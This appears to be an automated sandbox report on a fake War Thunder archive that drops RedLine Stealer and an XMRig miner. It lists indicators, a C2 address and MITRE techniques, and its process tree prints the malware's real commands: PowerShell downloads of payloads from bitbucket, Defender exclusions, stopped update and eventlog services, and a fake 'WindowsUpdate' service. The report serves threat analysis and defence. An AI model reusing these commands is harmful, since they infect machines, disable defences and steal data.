redline | hxxps://github[.]com[//]twitty1xnem/w-warthunderw/releases/download/cfhvs7k7qp/un[.]rar

Analysis

max time kernel
62s
max time network
106s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
26/07/2024, 15:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com//twitty1xnem/w-warthunderw/releases/download/cfhvs7k7qp/un.rar

Score

10^/10

redline xmrig discovery evasion execution infostealer miner persistence upx

Malware Config

Extracted

Family

redline

185.196.9.26:6302

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/3604-265-0x0000000000410000-0x0000000000460000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/1864-249-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1864-250-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1864-254-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1864-255-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1864-252-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1864-256-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1864-253-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
57	5080	powershell.exe
59	5080	powershell.exe
62	5436	powershell.exe
64	5436	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
5296	powershell.exe
5884	powershell.exe
5012	powershell.exe
1420	powershell.exe
5868	powershell.exe
5080	powershell.exe
5436	powershell.exe
4012	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 3 IoCs

pid	Process
6080	BlackLauncher.exe
5540	BlackLauncher.exe
4288	v10L3M7.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1864-244-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-246-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-245-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-249-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-250-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-254-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-255-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-252-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-256-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-253-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-248-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1864-243-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
84	bitbucket.org
56	bitbucket.org
57	bitbucket.org
62	bitbucket.org
75	pastebin.com
76	pastebin.com

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2684	sc.exe
2024	sc.exe
5828	sc.exe
6068	sc.exe
5436	sc.exe
632	sc.exe
4348	sc.exe
5284	sc.exe
4060	sc.exe
1460	sc.exe
3876	sc.exe
4932	sc.exe
5020	sc.exe
5772	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
4620	msedge.exe
4620	msedge.exe
1452	msedge.exe
1452	msedge.exe
3504	identity_helper.exe
3504	identity_helper.exe
5208	msedge.exe
5208	msedge.exe
5296	powershell.exe
5296	powershell.exe
5296	powershell.exe
5884	powershell.exe
5884	powershell.exe
5884	powershell.exe
5080	powershell.exe
5080	powershell.exe
5080	powershell.exe
5436	powershell.exe
5436	powershell.exe
5436	powershell.exe
4288	v10L3M7.exe
5012	powershell.exe
5012	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeRestorePrivilege	5760	7zFM.exe
Token: 35	5760	7zFM.exe
Token: SeRestorePrivilege	5900	7zG.exe
Token: 35	5900	7zG.exe
Token: SeSecurityPrivilege	5900	7zG.exe
Token: SeSecurityPrivilege	5900	7zG.exe
Token: SeRestorePrivilege	6012	7zG.exe
Token: 35	6012	7zG.exe
Token: SeSecurityPrivilege	6012	7zG.exe
Token: SeSecurityPrivilege	6012	7zG.exe
Token: 33	2784	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2784	AUDIODG.EXE
Token: SeDebugPrivilege	5296	powershell.exe
Token: SeDebugPrivilege	5884	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	5436	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe

Suspicious use of FindShellTrayWindow 46 IoCs

pid	Process
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
5760	7zFM.exe
5900	7zG.exe
6012	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
6080	BlackLauncher.exe
6080	BlackLauncher.exe
6080	BlackLauncher.exe
5540	BlackLauncher.exe
5540	BlackLauncher.exe
5540	BlackLauncher.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1452 wrote to memory of 4580	1452	msedge.exe	84
PID 1452 wrote to memory of 4580	1452	msedge.exe	84
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 1524	1452	msedge.exe	85
PID 1452 wrote to memory of 4620	1452	msedge.exe	86
PID 1452 wrote to memory of 4620	1452	msedge.exe	86
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87
PID 1452 wrote to memory of 468	1452	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com//twitty1xnem/w-warthunderw/releases/download/cfhvs7k7qp/un.rar
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9e75a46f8,0x7ff9e75a4708,0x7ff9e75a4718
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2
  2⤵
  PID:1524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
  2⤵
  PID:468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
  2⤵
  PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:8
  2⤵
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2592 /prefetch:1
  2⤵
  PID:1376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:4592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3436 /prefetch:8
  2⤵
  PID:4364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:1232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:2436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5208

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3184

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2684

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5476

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\un.rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5760

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14859:66:7zEvent11732
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5900

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\un\" -spe -an -ai#7zMap8062:66:7zEvent2096
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6012

C:\Users\Admin\Downloads\un\BlackLauncher.exe
"C:\Users\Admin\Downloads\un\BlackLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command " Start-Process -FilePath 'C:/Users/Admin/Downloads/un/BlackLauncher.exe' -ArgumentList '--rendering-driver opengl3 --admin-requested' -Verb RunAs "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5296
- - C:\Users\Admin\Downloads\un\BlackLauncher.exe
    "C:\Users\Admin\Downloads\un\BlackLauncher.exe" --rendering-driver opengl3 --admin-requested
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5884
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/v10L3M7.exe'""
      4⤵
      PID:6024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/v10L3M7.exe'"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5080
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/YpVbdgn.exe'""
      4⤵
      PID:756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/YpVbdgn.exe'"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5436
  - - C:\ProgramData\Update\v10L3M7.exe
      C:\ProgramData\Update\v10L3M7.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4288
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1780
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:5832
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:632
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:5828
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4060
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:5772
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:4348
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WindowsUpdate"
        5⤵
        Launches sc.exe
        
        PID:2024
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:6068
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:1460
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WindowsUpdate"
        5⤵
        Launches sc.exe
        
        PID:2684
  - - C:\ProgramData\Update\YpVbdgn.exe
      C:\ProgramData\Update\YpVbdgn.exe
      4⤵
      PID:4812
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:3604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5868
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/LVST3SS.exe'""
      4⤵
      PID:3636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/LVST3SS.exe'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4012

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x300 0x4f4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\ProgramData\Windows11\Updater.exe
C:\ProgramData\Windows11\Updater.exe
1⤵
PID:3956
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5716
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5296
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3876
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5284
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5436
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4932
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:5020
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5264
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:1864

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:4352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Update\YpVbdgn.exe

Filesize
575KB

MD5
ad2867dc002af2cca594f0b8202a1843

SHA1
73b3ea99db621b71e7a4a13720c53ebe3a815521

SHA256
2c0e4b4e5535c97fbf45309cbe7ff05006f06db1f3bf31983c7b0e7a7753900d

SHA512
cfb6c5f1333187e0e807a3b2beb72cb50805fac403b900242afce017ccde5a677d7b8c6be86fb9933db64103cb78b17c57fdec4c764f14c89793a5ec3e309108

Download Submit
C:\ProgramData\Update\v10L3M7.exe

Filesize
2.6MB

MD5
61d3abff46a6bd2946925542c7d30397

SHA1
1fed80a136e67a5b7b6846010a5853400886ee9c

SHA256
